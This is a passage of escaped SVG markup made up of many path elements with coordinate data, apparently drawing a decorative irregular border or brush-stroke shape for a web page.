<path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.